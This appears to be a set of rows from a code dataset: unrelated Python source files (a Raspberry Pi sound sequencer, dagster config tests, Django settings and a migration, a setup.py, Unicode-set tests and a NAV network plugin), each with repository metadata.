step = (step + 1) % 12
self.__playPattern(self.__stepPatterns[step])
next_time += self.__stepTime
def cleanup(self):
"""
Cleanup method which should be invoked before program exit
"""
# Destroy pygame objects and de-init GPIO pins
pygame.quit()
GPIO.output(self.__LED, GPIO.LOW)
GPIO.cleanup()
def __playPattern(self, pattern):
"""
Plays a collection of sounds called a 'pattern'
@param pattern - The collection of sounds
"""
for sound in pattern:
if sound != None: sound.play()
def __GPIOInit(self):
"""
Initialises the GPIO pins for the pi
(tested on the Pi3 Model B+)
"""
# Set mode PIN numbering to BCM, and define GPIO pin functions
GPIO.setmode(GPIO.BCM)
# Setup Function for input Pins
inputBNTs = (self.__soundBNTs + self.__stepBNTs)
inputBNTs.append(self.__playBNT)
inputBNTs.append(self.__recBNT)
for b in inputBNTs:
GPIO.setup(b, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Func for ouput Pins
GPIO.setup(self.__LED, GPIO.OUT)
def __soundInit(self):
"""
Initialises the pygame module and loads the sound samples
"""
# Initialise pygame module
pygame.mixer.pre_init(44100, -16, 12, 512) # TODO: Tweak values?
pygame.init()
# Load sounds from samples folder
self.__samples.append(pygame.mixer.Sound('samples/Blop-01.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Glitch-02.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Vocal-03.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Noise-04.wav'))
self.__samples.append(pygame.mixer.Sound('samples/SFX-05.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Strike-06.wav'))
for sample in self.__samples:
sample.set_volume(.95)
def __initCBs(self):
"""
Initialises the Callback functions for each Input IO pin
"""
# Sound Button Callbacks:
for i in range(6):
bnt = self.__soundBNTs[i]
smp = self.__samples[i]
GPIO.add_event_detect(bnt, GPIO.RISING, callback=lambda x,y=smp:
self.__soundCB(x, y), bouncetime=200)
# Step Button Callbacks:
for bnt in self.__stepBNTs:
GPIO.add_event_detect(bnt, GPIO.RISING, callback=lambda x:
self.__stepCB(x), bouncetime=200)
# Play Button Callback:
GPIO.add_event_detect(self.__playBNT, GPIO.RISING, callback=lambda x:
self.__playCB(x), bouncetime=200)
# Record Button Callback:
GPIO.add_event_detect(self.__recBNT, GPIO.RISING, callback=lambda x:
self.__recCB(x), bouncetime=200)
def __soundCB(self, channel, sound):
"""
Callback for sound button (a sound button also doubles as a step
button)
@param channel - The GPIO PIN that the signal was sent on
@param sound - The sound to play
"""
step = self.__stepChannels.index(channel)
self.__prtVerb("Sound bnt IO-{0}, Step={1}".format(channel, step))
if self.__recording:
self.__toggleStepSample(step, self.__currSamp)
else:
sound.play()
self.__currSamp = sound
def __stepCB(self, channel):
"""
Callback for step button
@param channel - The GPIO PIN that the signal was sent on
"""
step = self.__stepChannels.index(channel)
self.__prtVerb("Step bnt IO-{0}, Step={1}".format(channel, step))
if self.__recording:
self.__toggleStepSample(step, self.__currSamp)
def __playCB(self, channel):
"""
Callback for play button
@param channel - The GPIO PIN that the signal was sent on
"""
self.__prtVerb("Play bnt IO-{0}".format(channel))
self.__playSteps = not self.__playSteps # Toggle playing
def __recCB(self, channel):
"""
Callback for record button
@param channel - The GPIO PIN that the signal was sent on
"""
self.__prtVerb("Record bnt IO-{0}".format(channel))
GPIO.output(self.__LED, not GPIO.input(self.__LED)) # Toggle LED
self.__recording = not self.__recording # Toggle recording
def __toggleStepSample(self, step, sample):
"""
Will either add or remove a sound sample to/from a step 'pattern'
@param step - The step to check
@param sample - The sample to add or remove
"""
# Determine if the currently selected sample is 'on' the step
# if so - remove it, if not - add it
if sample in self.__stepPatterns[step]:
self.__stepPatterns[step].remove(sample)
else:
self.__stepPatterns[step].append(sample)
def __prtVerb(self, mesg):
"""
Verbose message print method
@param mesg - The message to print
"""
if self.__verbose:
print(mesg)
| 34.152074
| 77
| 0.564431
|
e4ef6414dcddde5a6be75bae30e4ef05b5fb7b72
| 4,724
|
py
|
Python
|
python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_config_spec.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 1
|
2021-04-27T19:49:59.000Z
|
2021-04-27T19:49:59.000Z
|
python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_config_spec.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 7
|
2022-03-16T06:55:04.000Z
|
2022-03-18T07:03:25.000Z
|
python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_config_spec.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from dagster import (
DagsterInvalidConfigDefinitionError,
Noneable,
Permissive,
Selector,
execute_solid,
solid,
)
def test_kitchen_sink():
@solid(
config_schema={
"str_field": str,
"int_field": int,
"list_int": [int],
"list_list_int": [[int]],
"dict_field": {"a_string": str},
"list_dict_field": [{"an_int": int}],
"selector_of_things": Selector(
{"select_list_dict_field": [{"an_int": int}], "select_int": int}
),
# this is a good argument to use () instead of [] for type parameterization in
# the config system
"optional_list_of_optional_string": Noneable([Noneable(str)]),
}
)
def kitchen_sink(context):
return context.solid_config
solid_config_one = {
"str_field": "kjf",
"int_field": 2,
"list_int": [3],
"list_list_int": [[1], [2, 3]],
"dict_field": {"a_string": "kdjfkd"},
"list_dict_field": [{"an_int": 2}, {"an_int": 4}],
"selector_of_things": {"select_int": 3},
"optional_list_of_optional_string": ["foo", None],
}
assert (
execute_solid(
kitchen_sink, run_config={"solids": {"kitchen_sink": {"config": solid_config_one}}},
).output_value()
== solid_config_one
)
solid_config_two = {
"str_field": "kjf",
"int_field": 2,
"list_int": [3],
"list_list_int": [[1], [2, 3]],
"dict_field": {"a_string": "kdjfkd"},
"list_dict_field": [{"an_int": 2}, {"an_int": 4}],
"selector_of_things": {"select_list_dict_field": [{"an_int": 5}]},
"optional_list_of_optional_string": None,
}
assert (
execute_solid(
kitchen_sink, run_config={"solids": {"kitchen_sink": {"config": solid_config_two}}},
).output_value()
== solid_config_two
)
def test_builtin_dict():
executed = {}
@solid(config_schema=dict)
def builtin_dict_solid(context):
executed["yup"] = True
return context.solid_config
assert isinstance(builtin_dict_solid.config_schema.config_type, Permissive)
assert execute_solid(
builtin_dict_solid, run_config={"solids": {"builtin_dict_solid": {"config": {"a": "b"}}}}
).output_value() == {"a": "b"}
assert executed["yup"]
def test_bad_solid_config_argument():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema="dkjfkd")
def _bad_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: 'dkjfkd'. 'dkjfkd' cannot be resolved."
)
def test_bad_solid_config_argument_nested():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"field": "kdjkfjd"})
def _bad_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'field': 'kdjkfjd'}. "
"Error at stack path :field. 'kdjkfjd' cannot be resolved."
)
def test_bad_solid_config_argument_list_wrong_length():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"bad_list": []})
def _bad_list_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'bad_list': []}. "
"Error at stack path :bad_list. [] cannot be resolved. "
"Reason: List must be of length 1."
)
def test_bad_solid_config_argument_list_bad_item():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"bad_list": ["kdjfkd"]})
def _bad_list_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'bad_list': ['kdjfkd']}. "
"Error at stack path :bad_list. ['kdjfkd'] cannot be resolved. "
"Reason: List have a single item and contain a valid type i.e. [int]. "
"Got item 'kdjfkd'."
)
def test_bad_solid_config_argument_list_bad_nested_item():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"bad_nested_list": [{"bad_field": "kjdkfd"}]})
def _bad_list_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'bad_nested_list': "
"[{'bad_field': 'kjdkfd'}]}. Error at stack path "
":bad_nested_list:bad_field. 'kjdkfd' cannot be resolved."
)
| 30.477419
| 97
| 0.61431
|
2a3745d9f2873d5bc4c1b6a58658316217195fc7
| 3,122
|
py
|
Python
|
app/app/settings.py
|
sarathp2409/receipe-app-api
|
be7245198a25103abfc45daeb3ba022806ee3857
|
[
"MIT"
] | null | null | null |
app/app/settings.py
|
sarathp2409/receipe-app-api
|
be7245198a25103abfc45daeb3ba022806ee3857
|
[
"MIT"
] | null | null | null |
app/app/settings.py
|
sarathp2409/receipe-app-api
|
be7245198a25103abfc45daeb3ba022806ee3857
|
[
"MIT"
] | null | null | null |
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'daobq_2yniem#waxqlrd_u1)s5y#1v9-o!+3*1@v=x2ei-3u+c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
| 25.177419
| 91
| 0.694427
|
af3455583180ef09a57028f1ea36e94d03f3c105
| 822
|
py
|
Python
|
setup.py
|
brentyi/nca
|
a018b26b2ac318d10065dac667498cc30ef844a4
|
[
"MIT"
] | null | null | null |
setup.py
|
brentyi/nca
|
a018b26b2ac318d10065dac667498cc30ef844a4
|
[
"MIT"
] | null | null | null |
setup.py
|
brentyi/nca
|
a018b26b2ac318d10065dac667498cc30ef844a4
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='torchnca',
version='0.1.0',
description='Neighbourhood Components Analysis in PyTorch.',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/kevinzakka/nca',
author='Kevin Zakka',
author_email='kevinarmandzakka@gmail.com',
license='MIT',
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
keywords='ai metric learning nearest neighbours dimensionality reduction',
packages=find_packages(exclude=['examples']),
install_requires=[
'numpy>=1.0.0,<2.0.0',
'torch>=1.0.0,<=1.4.0',
],
python_requires='>=3.5',
)
| 28.344828
| 76
| 0.695864
|
ba55c659a8cb3aaef80c73fa1c64948f7b5dfe2c
| 4,988
|
py
|
Python
|
python/tests/UnicodeSets_test.py
|
belluzj/sldr
|
cb7e49476654d915a05e250c406a0f59c49b5827
|
[
"MIT"
] | null | null | null |
python/tests/UnicodeSets_test.py
|
belluzj/sldr
|
cb7e49476654d915a05e250c406a0f59c49b5827
|
[
"MIT"
] | null | null | null |
python/tests/UnicodeSets_test.py
|
belluzj/sldr
|
cb7e49476654d915a05e250c406a0f59c49b5827
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the University nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import os
import sys
import unittest
try:
from sldr.ldml_exemplars import UCD
import sldr.UnicodeSets
except ImportError:
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'lib')))
from sldr.ldml_exemplars import UCD
import sldr.UnicodeSets
class UnicodeSetsTests(unittest.TestCase):
def setUp(self):
self.ucd = UCD()
def tearDown(self):
pass
def list2us_helper(self, text):
"""Wrap the list2us() function for ease of use."""
return sldr.UnicodeSets.list2us(text.split(' '), self.ucd)
# braces
def test_braces(self):
"""Multiple characters sequences need braces around them."""
self.assertEqual(u'[n {ng}]', self.list2us_helper(u'n ng'))
# normalization
def test_nfc(self):
"""NFC text."""
self.assertEqual(u'[\u00E9]', self.list2us_helper(u'\u00e9'))
# isolated marks
def test_isolated_marks_bmp(self):
"""Isolated marks (that is, with no base character) need to be escaped."""
self.assertEqual(u'[\\u0300 \\u0301 {\u0105\u0301}]', self.list2us_helper(u'\u0300 \u0301 \u0105\u0301'))
def test_isolated_marks_nonbmp(self):
"""Isolated marks (outside of the BMP as well) need to be escaped."""
self.assertEqual(u'[\U00011315 \\U0001133c]', self.list2us_helper(u'\U00011315 \U0001133C'))
# characters used in Unicode Set syntax
def ignore_control_escape(self):
"""Some ASCII control characters should be escaped with a backslash.
These maybe already listed in the variable simpleescs.
"""
self.assertEqual(u'[\u0007 \u0008 \u0009 \u000A \u000B \u000C \u000D]',
self.list2us_helper(u'\u0007 \u0008 \u0009 \u000A \u000B \u000C \u000D'))
def test_syntax_escape(self):
"""Some characters used in Unicode Set syntax need to be escaped with a backslash.
The following characters are escaped: []{}\\&-|^$:
They are all used in Unicode Set format
https://unicode.org/reports/tr35/tr35.html#Unicode_Sets
except for |. We escape | anyway, it should still work.
"""
self.assertEqual(u'[\\[ \\] \\{ \\} \\\\ \\& \\- \\| \\^ \\$ \\:]',
self.list2us_helper(u'[ ] { } \\ & - | ^ $ :'))
# escape some characters with hex digits
def test_ignorable(self):
"""Characters having the Default_Ignorable_Code_Point property need to be escaped."""
self.assertEqual(u'[\\u3164]', self.list2us_helper(u'\u3164'))
def test_format(self):
"""Characters having the format character (general category Cf) property need to be escaped."""
self.assertEqual(u'[\\u06dd]', self.list2us_helper(u'\u06dd'))
def test_space(self):
"""Space like characters need to be escaped."""
self.assertEqual(u'[\\u200a]', self.list2us_helper(u'\u200a'))
def test_pua_bmp(self):
"""PUA characters (in the BMP) need to be escaped."""
self.assertEqual(u'[\\ue000]', self.list2us_helper(u'\ue000'))
def test_pua_nonbmp_a(self):
"""PUA characters (outside of the BMP) need to be escaped."""
self.assertEqual(u'[\\U000fff80]', self.list2us_helper(u'\U000fff80'))
def test_pua_nonbmp_b(self):
"""PUA characters (outside of the BMP and SMP) need to be escaped."""
self.assertEqual(u'[\\U0010ff80]', self.list2us_helper(u'\U0010ff80'))
if __name__ == '__main__':
unittest.main()
| 40.225806
| 113
| 0.679832
|
5f025d6ec4453cd92532d92879541576a33cd536
| 401
|
py
|
Python
|
core-python/Core_Python/file/ByteReadAndWrite.py
|
theumang100/tutorials-1
|
497f54c2adb022c316530319a168fca1c007d4b1
|
[
"MIT"
] | 9
|
2020-04-23T05:24:19.000Z
|
2022-02-17T16:37:51.000Z
|
core-python/Core_Python/file/ByteReadAndWrite.py
|
theumang100/tutorials-1
|
497f54c2adb022c316530319a168fca1c007d4b1
|
[
"MIT"
] | 5
|
2020-10-01T05:08:37.000Z
|
2020-10-12T03:18:10.000Z
|
core-python/Core_Python/file/ByteReadAndWrite.py
|
theumang100/tutorials-1
|
497f54c2adb022c316530319a168fca1c007d4b1
|
[
"MIT"
] | 9
|
2020-04-28T14:06:41.000Z
|
2021-10-19T18:32:28.000Z
|
import os
# change your parent dir accordingly
parent_dir = "E:/GitHub/1) Git_Tutorials_Repo_Projects/core-python/Core_Python/ExFiles/"
with open(os.path.join(parent_dir,"ByteReadAndWrite.txt"),'wb+') as f:
f.writelines([b'<----This file is for file pointer example---->',b'\n<----After Writing the pointer change their position---->'])
f.seek(0,0)
print("Read binary files : ",f.read())
| 44.555556
| 133
| 0.700748
|
27ec174d935a616f45e0b5fff44a1f3ccadda8c6
| 1,096
|
py
|
Python
|
saleor/order/migrations/0105_order_total_paid_amount.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 15,337
|
2015-01-12T02:11:52.000Z
|
2021-10-05T19:19:29.000Z
|
saleor/order/migrations/0105_order_total_paid_amount.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 7,486
|
2015-02-11T10:52:13.000Z
|
2021-10-06T09:37:15.000Z
|
saleor/order/migrations/0105_order_total_paid_amount.py
|
aminziadna/saleor
|
2e78fb5bcf8b83a6278af02551a104cfa555a1fb
|
[
"CC-BY-4.0"
] | 5,864
|
2015-01-16T14:52:54.000Z
|
2021-10-05T23:01:15.000Z
|
# Generated by Django 3.1.8 on 2021-04-29 07:02
from django.db import migrations, models
from django.db.models.functions import Coalesce
def update_orders_total_paid_in_db(apps, schema_editor):
Order = apps.get_model("order", "Order")
Order.objects.update(
total_paid_amount=models.Subquery(
Order.objects.filter(id=models.OuterRef("id"))
.annotate(
_total_paid_amount=Coalesce(
models.Sum("payments__captured_amount"),
0,
output_field=models.DecimalField(),
)
)
.values("_total_paid_amount")[:1],
)
)
class Migration(migrations.Migration):
dependencies = [
("order", "0104_auto_20210506_0835"),
]
operations = [
migrations.AddField(
model_name="order",
name="total_paid_amount",
field=models.DecimalField(decimal_places=3, default=0, max_digits=12),
),
migrations.RunPython(update_orders_total_paid_in_db, migrations.RunPython.noop),
]
| 28.842105
| 88
| 0.604927
|
0daf1cbdab06b8486c89a25039b7b595ec518677
| 1,900
|
py
|
Python
|
src/cnaas_nms/plugins/nav.py
|
workfloworchestrator/cnaas-nms
|
4d45708ccb74f620cd5e3b7bc6bb0249ef31ce3d
|
[
"BSD-2-Clause-FreeBSD"
] | 48
|
2019-04-08T11:10:03.000Z
|
2022-03-31T10:47:56.000Z
|
src/cnaas_nms/plugins/nav.py
|
workfloworchestrator/cnaas-nms
|
4d45708ccb74f620cd5e3b7bc6bb0249ef31ce3d
|
[
"BSD-2-Clause-FreeBSD"
] | 143
|
2019-05-20T13:42:11.000Z
|
2022-03-29T07:29:29.000Z
|
src/cnaas_nms/plugins/nav.py
|
workfloworchestrator/cnaas-nms
|
4d45708ccb74f620cd5e3b7bc6bb0249ef31ce3d
|
[
"BSD-2-Clause-FreeBSD"
] | 9
|
2019-04-16T06:40:12.000Z
|
2021-12-03T09:48:46.000Z
|
import logging
import requests
from cnaas_nms.plugins.pluginspec import CnaasBasePlugin, hookimpl
from cnaas_nms.tools.log import get_logger
logger = get_logger()
class Plugin(CnaasBasePlugin):
def __init__(self):
self.urlbase = None
self.apitoken = None
self.organizationid = "Undefined"
self.snmp_community = "public"
self.roomid = "Undefined"
pluginvars = self.get_vars(__name__)
if 'urlbase' in pluginvars:
self.urlbase = pluginvars['urlbase']
if 'apitoken' in pluginvars:
self.apitoken = pluginvars['apitoken']
if 'organizationid' in pluginvars:
self.organizationid= pluginvars['organizationid']
if 'roomid' in pluginvars:
self.roomid = pluginvars['roomid']
if 'snmp_community' in pluginvars:
self.snmp_community = pluginvars['snmp_community']
@hookimpl
def selftest(self):
if self.urlbase and self.apitoken:
return True
else:
return False
@hookimpl
def new_managed_device(self, hostname, device_type, serial_number, vendor,
model, os_version, management_ip):
headers = {'Authorization': 'Token '+self.apitoken}
data = {
"ip": management_ip,
"sysname": hostname,
"roomid": self.roomid,
"organizationid": self.organizationid,
"categoryid": "SW",
"snmp_version": 2,
"read_only": self.snmp_community
}
r = requests.post(self.urlbase + "/api/1/netbox/",
headers=headers,
json=data)
if not r.status_code == 201:
logger.warn("Failed to add device to NAV: code {}: {} (data: {})".format(
r.status_code, r.text, data
))
return False
| 32.758621
| 85
| 0.577895
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.